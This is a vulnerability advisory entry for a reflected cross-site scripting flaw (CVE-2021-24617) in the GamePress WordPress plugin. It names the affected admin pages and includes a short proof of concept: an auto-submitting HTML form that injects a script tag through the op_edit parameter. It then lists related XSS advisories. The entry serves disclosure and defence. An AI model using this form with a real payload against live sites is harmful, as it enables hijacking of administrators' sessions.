GamePress <= 1.1.0 – Reflected Cross-Site Scripting | CVE 2021-24617 | Plugin Vulnerabilities

Description

The plugin does not escape the op_edit POST parameter before outputting it back in multiple Game Option pages, leading to Reflected Cross-Site Scripting issues

Proof of Concept

Affected pages: op=engines, op=perspectives, op=modes, op=genres, op=themes, op=platforms

<form action="https://example.com/wp-admin/admin.php?page=gp-ops&op=modes&id=test" method="post" name="test">
   <input type="text" name="op_edit" value="<script>alert('xss')</script>">
<button type="submit"></button>
</form>
<script>
document.test.submit();
</script>

Affects Plugins

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Neppah

Submitter

Neppah

Verified

Yes

WPVDB ID

3e262cd7-ca64-4190-8d8c-38b07bbe63e0

Timeline

Publicly Published

2021-09-20 (about 4 years ago)

Added

2021-09-20 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2024-10-28

Title

Post Status Notifier Lite and Premium <= 1.11.6 - Reflected Cross-Site Scripting via page

Published

2022-06-17

Title

Dyslexiefont Free < 1.0.0 - Authenticated Cross-Site Scripting

Published

2024-04-16

Title

Zynith SEO <= 7.4.9 - Unauthenticated Stored Cross-Site Scripting

Published

2022-05-23

Title

Simple Membership < 4.1.1 - Reflected Cross-Site Scripting

Published

2023-12-11

Title

WP TripAdvisor Review Slider < 11.9 - Admin+ Stored XSS